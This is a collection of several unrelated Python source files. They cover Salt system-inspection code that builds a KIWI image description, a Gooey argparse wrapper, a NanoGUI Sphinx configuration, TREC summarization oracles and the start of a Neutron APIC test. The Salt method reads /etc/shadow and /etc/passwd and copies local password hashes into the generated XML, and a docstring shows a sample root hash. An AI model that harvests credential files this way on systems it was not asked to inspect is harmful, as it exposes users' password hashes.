<user password="$1$wYJUgpM5$RXMMeASDc035eX.NbYWFl0" home="/root" name="root"/>
</users>
:param node:
:return:
'''
# Get real local users with the local passwords
shadow = {}
for sh_line in open('/etc/shadow').read().split(os.linesep):
if sh_line.strip():
login, pwd = sh_line.split(":")[:2]
if pwd and pwd[0] not in '!*':
shadow[login] = {'p': pwd}
for ps_line in open('/etc/passwd').read().split(os.linesep):
if ps_line.strip():
ps_line = ps_line.strip().split(':')
if ps_line[0] in shadow:
shadow[ps_line[0]]['h'] = ps_line[5]
shadow[ps_line[0]]['s'] = ps_line[6]
shadow[ps_line[0]]['g'] = self._get_user_groups(ps_line[0])
users_groups = []
users_node = etree.SubElement(node, 'users')
for u_name, u_data in shadow.items():
user_node = etree.SubElement(users_node, 'user')
user_node.set('password', u_data['p'])
user_node.set('home', u_data['h'])
user_node.set('name', u_name)
users_groups.extend(u_data['g'])
users_node.set('group', ','.join(users_groups))
return users_node
def _set_repositories(self, node):
'''
Create repositories.
:param node:
:return:
'''
priority = 99
for repo_id, repo_data in self._data.software.get('repositories', {}).items():
if type(repo_data) == list:
repo_data = repo_data[0]
if repo_data.get('enabled') or not repo_data.get('disabled'): # RPM and Debian, respectively
uri = repo_data.get('baseurl', repo_data.get('uri'))
if not uri:
continue
repo = etree.SubElement(node, 'repository')
if self.__grains__.get('os_family') in ('Kali', 'Debian'):
repo.set('alias', repo_id)
repo.set('distribution', repo_data['dist'])
else:
repo.set('alias', repo_data['alias'])
if self.__grains__.get('os_family', '') == 'Suse':
repo.set('type', 'yast2') # TODO: Check for options!
repo.set('priority', str(priority))
source = etree.SubElement(repo, 'source')
source.set('path', uri) # RPM and Debian, respectively
priority -= 1
def _set_packages(self, node):
'''
Set packages and collections.
:param node:
:return:
'''
pkgs = etree.SubElement(node, 'packages')
for pkg_name, pkg_version in sorted(self._data.software.get('packages', {}).items()):
pkg = etree.SubElement(pkgs, 'package')
pkg.set('name', pkg_name)
# Add collections (SUSE)
if self.__grains__.get('os_family', '') == 'Suse':
for ptn_id, ptn_data in self._data.software.get('patterns', {}).items():
if ptn_data.get('installed'):
ptn = etree.SubElement(pkgs, 'namedCollection')
ptn.set('name', ptn_id)
return pkgs
def _set_description(self, node):
'''
Create a system description.
:return:
'''
hostname = socket.getfqdn() or platform.node()
descr = etree.SubElement(node, 'description')
author = etree.SubElement(descr, 'author')
author.text = "salt.modules.node on {0}".format(hostname)
contact = etree.SubElement(descr, 'contact')
contact.text = 'root@{0}'.format(hostname)
specs = etree.SubElement(descr, 'specification')
specs.text = 'Rebuild of {0}, based on Salt inspection.'.format(hostname)
return descr
def _create_doc(self):
'''
Create document.
:return:
'''
root = etree.Element('image')
root.set('schemaversion', '6.3')
root.set('name', self.name)
return root
| |
from argparse import ArgumentParser, _SubParsersAction
from argparse import _MutuallyExclusiveGroup, _ArgumentGroup
class GooeySubParser(_SubParsersAction):
def __init__(self, *args, **kwargs):
super(GooeySubParser, self).__init__(*args, **kwargs)
# TODO: figure out how to correctly dispatch all of these
# so that the individual wrappers aren't needed
class GooeyArgumentGroup(_ArgumentGroup):
def __init__(self, parser, widgets, options, *args, **kwargs):
self.parser = parser
self.widgets = widgets
self.options = options
super(GooeyArgumentGroup, self).__init__(self.parser, *args, **kwargs)
def add_argument(self, *args, **kwargs):
widget = kwargs.pop('widget', None)
metavar = kwargs.pop('metavar', None)
options = kwargs.pop('gooey_options', None)
action = super(GooeyArgumentGroup, self).add_argument(*args, **kwargs)
self.parser._actions[-1].metavar = metavar
self.widgets[self.parser._actions[-1].dest] = widget
self.options[self.parser._actions[-1].dest] = options
return action
def add_argument_group(self, *args, **kwargs):
options = kwargs.pop('gooey_options', {})
group = GooeyArgumentGroup(self.parser, self.widgets, self.options, *args, **kwargs)
group.gooey_options = options
self._action_groups.append(group)
return group
def add_mutually_exclusive_group(self, *args, **kwargs):
options = kwargs.pop('gooey_options', {})
container = self
group = GooeyMutuallyExclusiveGroup(container, self.parser, self.widgets, self.options, *args, **kwargs)
group.gooey_options = options
self.parser._mutually_exclusive_groups.append(group)
return group
class GooeyMutuallyExclusiveGroup(_MutuallyExclusiveGroup):
def __init__(self, container, parser, widgets, options, *args, **kwargs):
self.parser = parser
self.widgets = widgets
self.options = options
super(GooeyMutuallyExclusiveGroup, self).__init__(container, *args, **kwargs)
def add_argument(self, *args, **kwargs):
widget = kwargs.pop('widget', None)
metavar = kwargs.pop('metavar', None)
options = kwargs.pop('gooey_options', None)
super(GooeyMutuallyExclusiveGroup, self).add_argument(*args, **kwargs)
self.parser._actions[-1].metavar = metavar
self.widgets[self.parser._actions[-1].dest] = widget
self.options[self.parser._actions[-1].dest] = options
class MyArgumentParser(ArgumentParser):
def __init__(self, **kwargs):
self._errors = []
super(MyArgumentParser, self).__init__(**kwargs)
def error(self, message):
self._errors.append(message)
def lift_relevant(**kwargs):
"""
Lifts the user's (likely) partial function into
total one of type `String -> Either Error a`
"""
try:
# Not all Parser Actions accept a type function. Rather
# than track what allows what explicitly, we just try to
# pass the `type` var to constructor. If is doesn't
# explode, then we're good and we use the lifted type. Otherwise
# we use the original kwargs
p = ArgumentParser()
lifted_kwargs = {**kwargs, 'type': lift(kwargs.get('type', identity))}
p.add_argument('-a', **lifted_kwargs)
return lifted_kwargs
except TypeError as e:
return kwargs
def cls_wrapper(cls, **options):
def inner(*args, **kwargs):
class ActionWrapper(cls):
def __call__(self, p, namespace, values, option_string, **qkwargs):
# print('hello from', options, namespace, values, option_string, qkwargs)
super(ActionWrapper, self).__call__(p, namespace, values, option_string, **qkwargs)
return ActionWrapper(*args, **kwargs)
return inner
class GooeyParser(object):
def __init__(self, **kwargs):
on_success = kwargs.pop('on_success', None)
on_error = kwargs.pop('on_error', None)
self.__dict__['parser'] = ArgumentParser(**kwargs)
self.widgets = {}
self.options = {}
self.on_gooey_success = on_success
self.on_gooey_error = on_error
if 'parents' in kwargs:
for parent in kwargs['parents']:
if isinstance(parent, self.__class__):
self.widgets.update(parent.widgets)
self.options.update(parent.options)
@property
def _mutually_exclusive_groups(self):
return self.parser._mutually_exclusive_groups
@property
def _actions(self):
return self.parser._actions
@property
def description(self):
return self.parser.description
def add_argument(self, *args, **kwargs):
widget = kwargs.pop('widget', None)
metavar = kwargs.pop('metavar', None)
options = kwargs.pop('gooey_options', None)
# TODO: move this to the control module. No need to do it
# at creation time.
# lifted_kwargs = lift_relevant(**kwargs)
#
# action_cls = self.parser._pop_action_class(kwargs)
# enhanced_action = cls_wrapper(action_cls, **(options if options else {}))
#
# action = self.parser.add_argument(*args, **{**lifted_kwargs, 'action': enhanced_action})
action = self.parser.add_argument(*args, **kwargs)
self.parser._actions[-1].metavar = metavar
action_dest = self.parser._actions[-1].dest
if action_dest not in self.widgets or self.widgets[action_dest] is None:
self.widgets[action_dest] = widget
if action_dest not in self.options or self.options[action_dest] is None:
self.options[self.parser._actions[-1].dest] = options
self._validate_constraints(
self.parser._actions[-1],
widget,
options or {},
**kwargs
)
return action
def add_mutually_exclusive_group(self, *args, **kwargs):
options = kwargs.pop('gooey_options', {})
group = GooeyMutuallyExclusiveGroup(self, self.parser, self.widgets, self.options, *args, **kwargs)
group.gooey_options = options
self.parser._mutually_exclusive_groups.append(group)
return group
def add_argument_group(self, *args, **kwargs):
options = kwargs.pop('gooey_options', {})
group = GooeyArgumentGroup(self.parser, self.widgets, self.options, *args, **kwargs)
group.gooey_options = options
self.parser._action_groups.append(group)
return group
def parse_args(self, args=None, namespace=None):
return self.parser.parse_args(args, namespace)
def add_subparsers(self, **kwargs):
if self._subparsers is not None:
self.error(_('cannot have multiple subparser arguments'))
# add the parser class to the arguments if it's not present
kwargs.setdefault('parser_class', type(self))
if 'title' in kwargs or 'description' in kwargs:
title = kwargs.pop('title', 'subcommands')
description = kwargs.pop('description', None)
self._subparsers = self.add_argument_group(title, description)
else:
self._subparsers = self._positionals
# prog defaults to the usage message of this parser, skipping
# optional arguments and with no "usage:" prefix
if kwargs.get('prog') is None:
formatter = self._get_formatter()
positionals = self._get_positional_actions()
groups = self._mutually_exclusive_groups
formatter.add_usage(self.usage, positionals, groups, '')
kwargs['prog'] = formatter.format_help().strip()
# create the parsers action and add it to the positionals list
parsers_class = self._pop_action_class(kwargs, 'parsers')
action = parsers_class(option_strings=[], **kwargs)
self._subparsers._add_action(action)
# return the created parsers action
return action
def _validate_constraints(self, parser_action, widget, options, **kwargs):
from gooey.python_bindings import constraints
constraints.assert_listbox_constraints(widget, **kwargs)
constraints.assert_visibility_requirements(parser_action, options)
def __getattr__(self, item):
return getattr(self.parser, item)
def __setattr__(self, key, value):
return setattr(self.parser, key, value)
| |
# -*- coding: utf-8 -*-
#
# NanoGUI documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 22 20:05:54 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import textwrap
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.ifconfig',
'breathe'
]
breathe_projects = { "NanoGUI": "./doxyoutput/xml" }
breathe_default_project = "NanoGUI"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'NanoGUI'
copyright = u'2016, Wenzel Jakob'
author = u'Wenzel Jakob'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# Tell sphinx what the primary language being documented is.
primary_domain = 'cpp'
# Tell sphinx what the pygments highlight language should be.
highlight_language = 'cpp'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# on_rtd is whether we are on readthedocs.org, this line of code grabbed from docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '../resources/icons/icon6.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'NanoGUIdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'NanoGUI.tex', u'NanoGUI Documentation',
u'Wenzel Jakob', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'nanogui', u'NanoGUI Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'NanoGUI', u'NanoGUI Documentation',
author, 'NanoGUI', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def generateDoxygenXML(stripPath):
'''
Generates the doxygen xml files used by breathe and exhale.
Approach modified from:
- https://github.com/fmtlib/fmt/blob/master/doc/build.py
:param stripPath:
The value you are sending to exhale.generate via the
key 'doxygenStripFromPath'. Usually, should be '..'.
'''
from subprocess import PIPE, Popen
try:
doxygen_cmd = ["doxygen", "-"]# "-" tells Doxygen to read configs from stdin
doxygen_proc = Popen(doxygen_cmd, stdin=PIPE)
doxygen_input = r'''
# Make this the same as what you tell exhale.
OUTPUT_DIRECTORY = doxyoutput
# If you need this to be YES, exhale will probably break.
CREATE_SUBDIRS = NO
# So that only include/ and subdirectories appear.
FULL_PATH_NAMES = YES
STRIP_FROM_PATH = "%s/"
# Tell Doxygen where the source code is (yours may be different).
INPUT = ../include
# Nested folders will be ignored without this. You may not need it.
RECURSIVE = YES
# Set to YES if you are debugging or want to compare.
GENERATE_HTML = NO
# Unless you want it?
GENERATE_LATEX = NO
# Both breathe and exhale need the xml.
GENERATE_XML = YES
# Set to NO if you do not want the Doxygen program listing included.
XML_PROGRAMLISTING = YES
# Allow for rst directives and advanced functions (e.g. grid tables)
ALIASES = "rst=\verbatim embed:rst:leading-asterisk"
ALIASES += "endrst=\endverbatim"
# We definitely need the preprocessor for this project.
ENABLE_PREPROCESSING = YES
MACRO_EXPANSION = YES
EXPAND_ONLY_PREDEF = NO
SKIP_FUNCTION_MACROS = NO
PREDEFINED = NAMESPACE_BEGIN(nanogui)="namespace nanogui {"
PREDEFINED += NAMESPACE_END(nanogui)="}"
PREDEFINED += NAMESPACE_BEGIN(detail)="namespace detail {"
PREDEFINED += NAMESPACE_END(detail)="}"
PREDEFINED += DOXYGEN_SHOULD_SKIP_THIS
PREDEFINED += DOXYGEN_DOCUMENTATION_BUILD
PREDEFINED += NANOGUI_EXPORT
''' % stripPath
# In python 3 strings and bytes are no longer interchangeable
if sys.version[0] == "3":
doxygen_input = bytes(doxygen_input, 'ASCII')
doxygen_proc.communicate(input=doxygen_input)
doxygen_proc.stdin.close()
if doxygen_proc.wait() != 0:
raise RuntimeError("Non-zero return code from 'doxygen'...")
except Exception as e:
raise Exception("Unable to execute 'doxygen': {}".format(e))
# setup is called auto-magically for you by Sphinx
def setup(app):
stripPath = ".."
generateDoxygenXML(stripPath)
# generate description text for the library api
libraryDescription = textwrap.dedent('''
Welcome to the developer reference to NanoGUI. The documentation is actively being
developed / updated. If you would like to help document any part of the project
you may be familiar with, please refer to the :ref:`developer_contribution` page.
.. note::
Presented below is only the C++ API. If you are using the Python API, the
contents below are still applicable for understanding what methods are available.
While the documentation for the C++ API is useful as a reference for
understanding what a given class does, the Python API does differ. Please refer
to the more concise :ref:`nanogui_example_2` for comparing the differences
between the C++ and Python interfaces.
''')
# create the dictionary to send to exhale
exhaleArgs = {
"doxygenIndexXMLPath" : "./doxyoutput/xml/index.xml",
"containmentFolder" : "./generated_api",
"rootFileName" : "library_root.rst",
"rootFileTitle" : "Library API",
"fullToctreeMaxDepth" : 1,
"createTreeView" : True,
"afterTitleDescription" : libraryDescription,
"doxygenStripFromPath" : ".."
}
# import the exhale module from the current directory and generate the api
from exhale import generate
generate(exhaleArgs)
| |
import os
from cuttsum.resources import MultiProcessWorker
from cuttsum.pipeline import ArticlesResource
from cuttsum.misc import si2df
import cuttsum.judgements
import numpy as np
import pandas as pd
import sumpy
class RetrospectiveMonotoneSubmodularOracle(MultiProcessWorker):
def __init__(self):
self.dir_ = os.path.join(
os.getenv(u"TREC_DATA", u"."), "system-results",
"retrospective-monotone-submodular-oracle-summaries")
if not os.path.exists(self.dir_):
os.makedirs(self.dir_)
def get_path_prefix(self, event, corpus, extractor,
budget, soft_matching):
return os.path.join(self.dir_, extractor, str(budget),
"soft_match" if soft_matching is True else "no_soft_match",
corpus.fs_name(), event.fs_name())
def get_job_units(self, event, corpus, **kwargs):
extractor = kwargs.get("extractor", "gold")
if extractor == "gold" or extractor == "goose":
return [0]
else:
raise Exception(
"extractor: {} not implemented!".format(extractor))
def do_job_unit(self, event, corpus, unit, **kwargs):
if unit != 0:
raise Exception("unit of work out of bounds!")
extractor = kwargs.get("extractor", "gold")
soft_match = kwargs.get("soft_match", False)
budget = kwargs.get("budget", 25)
output_path_prefix = self.get_path_prefix(
event, corpus, extractor, budget, soft_match)
## Set up summarizer ###
# This is the monotone submodular objective function (basically
# nugget coverage).
def f_of_A(system, A, V_min_A, e, input_df, ndarray_data):
return len(
set([nugget for nuggets in input_df.ix[A, "nuggets"].tolist()
for nugget in nuggets]))
system = sumpy.system.MonotoneSubmodularBasic(f_of_A=f_of_A, k=budget)
# Get gold matchings for oracle.
articles = ArticlesResource()
all_matches = cuttsum.judgements.get_merged_dataframe()
matches = all_matches[all_matches["query id"] == event.query_id]
# Set up soft matching if we are using it.
if soft_match is True:
from cuttsum.classifiers import NuggetClassifier
classify_nuggets = NuggetClassifier().get_classifier(event)
if event.query_id.startswith("TS13"):
judged = cuttsum.judgements.get_2013_updates()
judged = judged[judged["query id"] == event.query_id]
judged_uids = set(judged["update id"].tolist())
else:
raise Exception("Bad corpus!")
# All sentences containing nuggets will go in all_df.
all_df = []
# Pull out articles with nuggets.
for hour, path, si in articles.streamitem_iter(
event, corpus, extractor):
# Convert stream item to dataframe and add gold label nuggets.
df = si2df(si, extractor=extractor)
df["nuggets"] = df["update id"].apply(
lambda x: set(
matches[matches["update id"] == x]["nugget id"].tolist()))
# Perform soft nugget matching on unjudged sentences.
if soft_match is True:
### NOTE BENE: geting an array of indices to index unjudged
# sentences so I can force pandas to return a view and not a
# copy.
I = np.where(
df["update id"].apply(lambda x: x not in judged_uids))[0]
unjudged = df[
df["update id"].apply(lambda x: x not in judged_uids)]
unjudged_sents = unjudged["sent text"].tolist()
assert len(unjudged_sents) == I.shape[0]
df.loc[I, "nuggets"] = classify_nuggets(unjudged_sents)
# Add sentences with nuggets to final set for summarzing
df = df[df["nuggets"].apply(len) > 0]
all_df.append(df)
# Collect all dataframes into one and reset index (ALWAYS RESET
# THE INDEX because pandas hates me.)
all_df = pd.concat(all_df)
all_df.reset_index(inplace=True)
summary = system.summarize(all_df)
F_of_S = len(
set(n for ns in summary._df["nuggets"].tolist() for n in ns))
#print "F(S)", F_of_S
#print "summary nuggets"
sum_nuggets = list(set(
n for ns in summary._df["nuggets"].tolist() for n in ns))
sum_nuggets.sort()
print sum_nuggets
possible_nuggets = list(set(
n for ns in all_df["nuggets"].tolist() for n in ns))
possible_nuggets.sort()
print possible_nuggets
print len(possible_nuggets)
event_nuggets = set(matches["nugget id"].tolist())
total_nuggets = len(event_nuggets)
timestamp = int(si.stream_id.split("-")[0])
output_df = pd.DataFrame(
[{"Cum. F(S)": F_of_S,
"F(S)": F_of_S,
"UB no const.": len(possible_nuggets), # total_nuggets,
"budget": budget,
"Tot. Updates": len(summary._df),
"event title": event.fs_name(),
"timestamp": timestamp,
"query id": event.query_id},],
columns=["timestamp", "query id", "event title", "Cum. F(S)",
"F(S)", "UB no const.",
"Tot. Updates", "budget",])
parent = os.path.dirname(output_path_prefix)
if not os.path.exists(parent):
os.makedirs(parent)
stats_path = output_path_prefix + ".stats.tsv"
updates_path = output_path_prefix + ".updates.tsv"
with open(stats_path, "w") as f:
output_df.to_csv(f, sep="\t", index=False)
summary._df["sent text"] = summary._df["sent text"].apply(
lambda x: x.encode("utf-8"))
with open(updates_path, "w") as f:
summary._df[["timestamp", "update id", "sent text"]].sort(
["update id"]).to_csv(f, sep="\t", index=False)
class MonotoneSubmodularOracle(MultiProcessWorker):
def __init__(self):
self.dir_ = os.path.join(
os.getenv(u"TREC_DATA", u"."), "system-results",
"monotone-submodular-oracle-summaries")
if not os.path.exists(self.dir_):
os.makedirs(self.dir_)
def get_path_prefix(self, event, corpus, extractor, budget, soft_matching):
return os.path.join(self.dir_, extractor, str(budget),
"soft_match" if soft_matching is True else "no_soft_match",
corpus.fs_name(), event.fs_name())
def get_job_units(self, event, corpus, **kwargs):
extractor = kwargs.get("extractor", "gold")
if extractor == "gold" or extractor == "goose":
return [0]
else:
raise Exception("extractor: {} not implemented!".format(extractor))
def do_job_unit(self, event, corpus, unit, **kwargs):
if unit != 0:
raise Exception("unit of work out of bounds!")
extractor = kwargs.get("extractor", "gold")
soft_match = kwargs.get("soft_match", False)
budget = kwargs.get("budget", 25)
output_path_prefix = self.get_path_prefix(
event, corpus, extractor, budget, soft_match)
## Set up summarizer ###
def f_of_A(system, A, V_min_A, e, input_df, ndarray_data):
return len(
set([nugget for nuggets in input_df.ix[A, "nuggets"].tolist()
for nugget in nuggets]))
system = sumpy.system.MonotoneSubmodularBasic(f_of_A=f_of_A, k=budget)
# Collect all previously collected nuggets here.
nugget_cache = set()
# Get gold matchings for oracle.
articles = ArticlesResource()
all_matches = cuttsum.judgements.get_merged_dataframe()
matches = all_matches[all_matches["query id"] == event.query_id]
# Set up soft matching if we are using it.
if soft_match is True:
from cuttsum.classifiers import NuggetClassifier
classify_nuggets = NuggetClassifier().get_classifier(event)
if event.query_id.startswith("TS13"):
judged = cuttsum.judgements.get_2013_updates()
judged = judged[judged["query id"] == event.query_id]
judged_uids = set(judged["update id"].tolist())
else:
raise Exception("Bad corpus!")
# Collect stats for each document here.
stats = []
# Aggregate summaries in summary_df.
summary_df = []
cum_F_of_S = 0
all_seen_nuggets = set()
# event_nuggets = set(matches["nugget id"].tolist())
# total_nuggets = len(event_nuggets)
total_updates = 0
# Pull out articles with nuggets.
for hour, path, si in articles.streamitem_iter(
event, corpus, extractor):
print hour, si.stream_id
# Convert stream item to dataframe and add gold label nuggets.
df = si2df(si, extractor=extractor)
df["nuggets"] = df["update id"].apply(
lambda x: set(
matches[matches["update id"] == x]["nugget id"].tolist()))
# Perform soft nugget matching on unjudged sentences.
if soft_match is True:
### NOTE BENE: geting an array of indices to index unjudged
# sentences so I can force pandas to return a view and not a
# copy.
I = np.where(
df["update id"].apply(lambda x: x not in judged_uids))[0]
unjudged = df[
df["update id"].apply(lambda x: x not in judged_uids)]
unjudged_sents = unjudged["sent text"].tolist()
assert len(unjudged_sents) == I.shape[0]
df.loc[I, "nuggets"] = classify_nuggets(unjudged_sents)
# Remove nuggets from dataframe if we have already collected them in
# the cache. The scoring function should ignore these.
df = df[df["nuggets"].apply(len) > 0]
all_seen_nuggets.update(
set(n for ns in df["nuggets"].tolist() for n in ns))
df["nuggets"] = df["nuggets"].apply(
lambda x: x.difference(nugget_cache))
if len(df) == 0:
continue
# Run summarizer on current document and update stats about it.
summary = system.summarize(df)
summary_nuggets = set(n for ns in summary._df["nuggets"].tolist()
for n in ns)
nugget_cache.update(summary_nuggets)
system.k -= len(summary._df)
F_of_S = len(summary_nuggets)
cum_F_of_S += F_of_S
total_updates += len(summary._df)
timestamp = int(si.stream_id.split("-")[0])
stats.append({
"Cum. F(S)": cum_F_of_S,
"F(S)": F_of_S,
"UB no const.": len(all_seen_nuggets),
"budget": budget,
"Tot. Updates": total_updates,
"event title": event.fs_name(),
"timestamp": timestamp,
"query id": event.query_id,
})
summary_df.append(summary._df)
if system.k <= 0:
print "Budget exceeded!"
break
output_df = pd.DataFrame(stats,
columns=["timestamp", "query id", "event title",
"Cum. F(S)", "F(S)", "UB no const.",
"Tot. Updates", "budget",])
# Write stats and updates to file.
parent = os.path.dirname(output_path_prefix)
if not os.path.exists(parent):
os.makedirs(parent)
stats_path = output_path_prefix + ".stats.tsv"
updates_path = output_path_prefix + ".updates.tsv"
with open(stats_path, "w") as f:
output_df.to_csv(f, sep="\t", index=False)
summary_df = pd.concat(summary_df)
summary_df["sent text"] = summary_df["sent text"].apply(
lambda x: x.encode("utf-8"))
with open(updates_path, "w") as f:
summary_df[["timestamp", "update id", "sent text"]].sort(
["update id"]).to_csv(f, sep="\t", index=False)
| |
# Copyright (c) 2014 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import mock
sys.modules["apicapi"] = mock.Mock()
from neutron.plugins.ml2.drivers.cisco.apic import apic_topology
from neutron.tests import base
from neutron.tests.unit.plugins.ml2.drivers.cisco.apic import (
base as mocked)
NOTIFIER = ('neutron.plugins.ml2.drivers.cisco.apic.'
'apic_topology.ApicTopologyServiceNotifierApi')
RPC_CONNECTION = 'neutron.common.rpc.Connection'
AGENTS_DB = 'neutron.db.agents_db'
PERIODIC_TASK = 'oslo_service.periodic_task'
DEV_EXISTS = 'neutron.agent.linux.ip_lib.device_exists'
IP_DEVICE = 'neutron.agent.linux.ip_lib.IPDevice'
EXECUTE = 'neutron.agent.linux.utils.execute'
LLDP_CMD = ['lldpctl', '-f', 'keyvalue']
ETH0 = mocked.SERVICE_HOST_IFACE
LLDPCTL_RES = (
'lldp.' + ETH0 + '.via=LLDP\n'
'lldp.' + ETH0 + '.rid=1\n'
'lldp.' + ETH0 + '.age=0 day, 20:55:54\n'
'lldp.' + ETH0 + '.chassis.mac=' + mocked.SERVICE_HOST_MAC + '\n'
'lldp.' + ETH0 + '.chassis.name=' + mocked.SERVICE_PEER_CHASSIS_NAME + '\n'
'lldp.' + ETH0 + '.chassis.descr=' + mocked.SERVICE_PEER_CHASSIS + '\n'
'lldp.' + ETH0 + '.chassis.Bridge.enabled=on\n'
'lldp.' + ETH0 + '.chassis.Router.enabled=on\n'
'lldp.' + ETH0 + '.port.local=' + mocked.SERVICE_PEER_PORT_LOCAL + '\n'
'lldp.' + ETH0 + '.port.descr=' + mocked.SERVICE_PEER_PORT_DESC)
class TestCiscoApicTopologyService(base.BaseTestCase,
mocked.ControllerMixin,
mocked.ConfigMixin):
